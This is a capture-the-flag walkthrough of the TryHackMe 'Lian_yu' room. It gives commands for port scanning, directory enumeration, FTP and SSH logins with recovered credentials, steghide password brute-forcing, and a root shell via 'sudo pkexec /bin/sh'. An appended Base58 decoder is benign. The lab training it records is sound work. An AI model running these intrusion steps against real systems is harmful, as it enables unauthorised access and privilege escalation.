TryHackMe : Lian_yu walkthrough

A write-up covering the steps taken to solve a beginner-level security challenge: the lianyu room on the TryHackMe platform.

This blog is written as part of a task for the Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine

1. Connect to TryHackMe by entering the command:

sudo openvpn /pathtoOVPNfile.ovpn

2. Start the machine in the ‘lianyu’ room; the target IP address will be displayed in a minute.

Step 2 : Information gathering using Nmap and gobuster

1. Start an nmap scan of the target IP:

nmap -A -O <target ip>

nmap result

Open ports:

21 — ftp vsftpd 3.0.2

22 — ssh

80 — http apache

111 — rpcbind 2-4

2. Accessing open ports:

port 80

3. Using gobuster for directory enumeration:

gobuster dir -u http://<target ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

4. Navigating to the found directory /island and viewing the page source:

5. Enumerating further with gobuster under /island:

gobuster dir -u http://<target ip>/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

6. Navigating to the newly found folder: found information about a hidden .<foldername> folder

7. Using gobuster with the -x flag to find the hidden folder:

gobuster dir -u http://<target ip>/island/<folder from step 5> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .<dirnameFromabove>

8. Navigating to the hidden folder found above reveals a hint which, after searching on Google, turns out to need decoding with Base58.

9. Now logging in to the FTP service with the initial username found:

Try to log in over FTP with the vigilante username and the Base58-decoded password:

ftp <targetip>

ftp login successful

10. Transferring the files found over FTP to the local machine:

Also, navigating to a different folder revealed another user’s name. It will be useful when logging in through the SSH service.

11. Using StegCracker on all transferred files to brute-force the steghide password:

stegcracker <filename>.jpg /usr/share/wordlists/rockyou.txt

12. Using steghide to extract the hidden files:

steghide extract -sf <filename>.jpg

13. Unzip the files to find the password for SSH login in the shado file:

14. Log in as the other user found through the FTP login:

ssh <username>@<target ip>

ssh login successful

15. After looking around, found the ‘user.txt’ file:


16. Checking for privilege escalation:

sudo -l

17. Searched through GTFOBins and found the command below:

sudo pkexec /bin/sh

18. Found root.txt
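
Step 8 only says that the hint has to be Base58-decoded. The following Python decoder is an added example, not part of the original write-up; it assumes the Bitcoin Base58 alphabet (the page does not say which alphabet applies), and the sample value is constructed rather than taken from the room.

```python
# Added example: Base58 encode/decode.
# Assumption: Bitcoin alphabet (no 0, O, I, l); other Base58 variants reorder it.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def b58decode(text: str) -> bytes:
    """Decode a Base58 string, rejecting characters outside the alphabet."""
    text = text.strip()
    value = 0
    for pos, ch in enumerate(text):
        if ch not in INDEX:
            raise ValueError(f"invalid Base58 character {ch!r} at position {pos}")
        value = value * 58 + INDEX[ch]
    # Each leading '1' stands for one leading zero byte, which the integer loses.
    pad = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big")
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58, preserving leading zero bytes as '1' characters."""
    pad = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    return "1" * pad + "".join(reversed(digits))


if __name__ == "__main__":
    # Constructed sample, not the hint from the room.
    sample = b58encode(b"constructed-sample")
    print(sample, "->", b58decode(sample).decode())
    try:
        b58decode("0OIl")  # all four characters are excluded from the alphabet
    except ValueError as err:
        print("rejected:", err)
```

If decoding fails with an invalid-character error, the string is either not Base58 or uses a different alphabet.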


With these steps, I was able to answer all the questions posted in the lianyu room on TryHackMe.




Software Tester
